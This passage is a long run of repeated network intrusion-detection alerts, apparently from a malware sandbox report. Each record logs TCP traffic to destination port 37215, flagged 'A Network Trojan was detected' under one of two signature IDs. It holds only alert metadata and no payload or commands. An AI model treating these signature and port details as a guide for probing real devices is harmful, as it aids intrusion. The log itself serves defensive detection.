                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788329
                SID:2835222
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624598
                SID:2829579
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363126
                SID:2835222
                Source Port:43334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883023
                SID:2829579
                Source Port:46456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509641
                SID:2835222
                Source Port:54836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224275
                SID:2835222
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597304
                SID:2835222
                Source Port:38706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.828050
                SID:2835222
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843547
                SID:2829579
                Source Port:43146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227460
                SID:2835222
                Source Port:41746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559189
                SID:2829579
                Source Port:49268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281703
                SID:2829579
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562061
                SID:2829579
                Source Port:45308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217089
                SID:2835222
                Source Port:33438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881193
                SID:2829579
                Source Port:57282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071336
                SID:2829579
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101088
                SID:2835222
                Source Port:40466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177016
                SID:2829579
                Source Port:43860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141097
                SID:2829579
                Source Port:48762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265531
                SID:2835222
                Source Port:54542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532300
                SID:2829579
                Source Port:56700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638872
                SID:2835222
                Source Port:52506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669514
                SID:2835222
                Source Port:44518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713261
                SID:2835222
                Source Port:53446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210084
                SID:2835222
                Source Port:60414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638844
                SID:2835222
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644826
                SID:2835222
                Source Port:42492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262651
                SID:2835222
                Source Port:57064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716309
                SID:2829579
                Source Port:35322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.964053
                SID:2835222
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415695
                SID:2835222
                Source Port:43512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773272
                SID:2829579
                Source Port:53490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023183
                SID:2835222
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572346
                SID:2835222
                Source Port:58864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162170
                SID:2835222
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988649
                SID:2829579
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427057
                SID:2829579
                Source Port:33166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.654868
                SID:2829579
                Source Port:60426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325747
                SID:2835222
                Source Port:58352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730746
                SID:2829579
                Source Port:35964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257140
                SID:2835222
                Source Port:57358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942784
                SID:2835222
                Source Port:34246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212905
                SID:2835222
                Source Port:39764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670727
                SID:2829579
                Source Port:58344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970975
                SID:2835222
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319091
                SID:2835222
                Source Port:51532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897184
                SID:2835222
                Source Port:38978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.391749
                SID:2835222
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715439
                SID:2835222
                Source Port:44912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654514
                SID:2829579
                Source Port:48218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920064
                SID:2829579
                Source Port:38834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234117
                SID:2829579
                Source Port:51274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437410
                SID:2829579
                Source Port:45436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586173
                SID:2835222
                Source Port:39254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236116
                SID:2829579
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584335
                SID:2835222
                Source Port:56582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502823
                SID:2829579
                Source Port:52476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945673
                SID:2835222
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422298
                SID:2829579
                Source Port:43596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597278
                SID:2835222
                Source Port:33814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015801
                SID:2835222
                Source Port:44136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209953
                SID:2835222
                Source Port:38880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616253
                SID:2835222
                Source Port:41872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028707
                SID:2829579
                Source Port:50540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618046
                SID:2835222
                Source Port:33816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431173
                SID:2829579
                Source Port:46972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212333
                SID:2835222
                Source Port:43844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221815
                SID:2835222
                Source Port:38238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853353
                SID:2835222
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931950
                SID:2829579
                Source Port:33354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719464
                SID:2835222
                Source Port:52130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498577
                SID:2835222
                Source Port:46998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506215
                SID:2829579
                Source Port:37896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833374
                SID:2829579
                Source Port:49086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668762
                SID:2835222
                Source Port:48628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438379
                SID:2829579
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.437241
                SID:2835222
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597873
                SID:2829579
                Source Port:36126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069722
                SID:2829579
                Source Port:41048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929271
                SID:2829579
                Source Port:48548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721656
                SID:2829579
                Source Port:51398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728167
                SID:2829579
                Source Port:37334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968548
                SID:2829579
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867909
                SID:2835222
                Source Port:41884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731707
                SID:2835222
                Source Port:34318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091771
                SID:2835222
                Source Port:37286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735135
                SID:2829579
                Source Port:56906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335837
                SID:2829579
                Source Port:53328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848873
                SID:2829579
                Source Port:51240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263951
                SID:2829579
                Source Port:56498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771153
                SID:2829579
                Source Port:34042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653562
                SID:2835222
                Source Port:39576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269968
                SID:2835222
                Source Port:49836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154487
                SID:2829579
                Source Port:41742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823322
                SID:2829579
                Source Port:45778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292195
                SID:2829579
                Source Port:46636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.389775
                SID:2829579
                Source Port:52340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180351
                SID:2829579
                Source Port:50946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571526
                SID:2829579
                Source Port:55308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025607
                SID:2829579
                Source Port:59374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013579
                SID:2829579
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091613
                SID:2829579
                Source Port:47336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417226
                SID:2829579
                Source Port:59250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912684
                SID:2829579
                Source Port:36496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384214
                SID:2835222
                Source Port:50370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436266
                SID:2835222
                Source Port:54440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503592
                SID:2829579
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811860
                SID:2829579
                Source Port:40718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283293
                SID:2829579
                Source Port:54814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331735
                SID:2829579
                Source Port:37518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433034
                SID:2835222
                Source Port:45174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501593
                SID:2829579
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586053
                SID:2835222
                Source Port:56100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787958
                SID:2829579
                Source Port:47012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270346
                SID:2829579
                Source Port:59290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240165
                SID:2835222
                Source Port:33188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652511
                SID:2835222
                Source Port:44542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897515
                SID:2829579
                Source Port:49380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665588
                SID:2829579
                Source Port:35626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862762
                SID:2829579
                Source Port:47852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941348
                SID:2835222
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292614
                SID:2829579
                Source Port:40246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612338
                SID:2829579
                Source Port:35696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563256
                SID:2829579
                Source Port:59812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916045
                SID:2829579
                Source Port:33986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009490
                SID:2835222
                Source Port:55648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805760
                SID:2835222
                Source Port:38462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361603
                SID:2829579
                Source Port:44534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449004
                SID:2829579
                Source Port:50734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224022
                SID:2835222
                Source Port:36952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420342
                SID:2829579
                Source Port:60856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071668
                SID:2835222
                Source Port:42814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239282
                SID:2829579
                Source Port:34968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665609
                SID:2829579
                Source Port:59248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802904
                SID:2835222
                Source Port:41308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763732
                SID:2835222
                Source Port:38412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365729
                SID:2829579
                Source Port:50122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133260
                SID:2829579
                Source Port:36320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154478
                SID:2835222
                Source Port:53642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684454
                SID:2835222
                Source Port:59756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266653
                SID:2835222
                Source Port:53192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264850
                SID:2829579
                Source Port:50876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043840
                SID:2835222
                Source Port:40798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900191
                SID:2835222
                Source Port:54318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326396
                SID:2835222
                Source Port:52254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583408
                SID:2829579
                Source Port:54288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730286
                SID:2835222
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019872
                SID:2835222
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111285
                SID:2835222
                Source Port:40758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787978
                SID:2835222
                Source Port:58624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328145
                SID:2835222
                Source Port:45894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.870116
                SID:2835222
                Source Port:38330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100928
                SID:2829579
                Source Port:58720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948141
                SID:2829579
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432675
                SID:2835222
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763305
                SID:2835222
                Source Port:43212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419484
                SID:2835222
                Source Port:50776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780015
                SID:2835222
                Source Port:46954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841612
                SID:2829579
                Source Port:59392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277376
                SID:2835222
                Source Port:57724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030394
                SID:2835222
                Source Port:48372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919441
                SID:2835222
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227042
                SID:2829579
                Source Port:50344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035025
                SID:2835222
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336086
                SID:2835222
                Source Port:43072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959379
                SID:2829579
                Source Port:49264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556987
                SID:2835222
                Source Port:42032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982150
                SID:2829579
                Source Port:35138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371588
                SID:2829579
                Source Port:56606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898707
                SID:2835222
                Source Port:55744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655732
                SID:2835222
                Source Port:35814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.578991
                SID:2835222
                Source Port:46976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464787
                SID:2835222
                Source Port:42156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858420
                SID:2835222
                Source Port:37236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928249
                SID:2835222
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767649
                SID:2829579
                Source Port:45754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173349
                SID:2829579
                Source Port:39150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853935
                SID:2829579
                Source Port:38904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448874
                SID:2835222
                Source Port:35558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883830
                SID:2829579
                Source Port:52972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329391
                SID:2835222
                Source Port:40850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161288
                SID:2829579
                Source Port:53238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763829
                SID:2835222
                Source Port:37328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473446
                SID:2835222
                Source Port:40954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571432
                SID:2829579
                Source Port:49542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960600
                SID:2835222
                Source Port:59944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321617
                SID:2835222
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.235100
                SID:2835222
                Source Port:55298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557612
                SID:2835222
                Source Port:40952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.469654
                SID:2835222
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101495
                SID:2829579
                Source Port:59596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970490
                SID:2829579
                Source Port:54620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785464
                SID:2829579
                Source Port:49344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815803
                SID:2835222
                Source Port:57988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818139
                SID:2835222
                Source Port:47462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617362
                SID:2835222
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966568
                SID:2835222
                Source Port:57720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
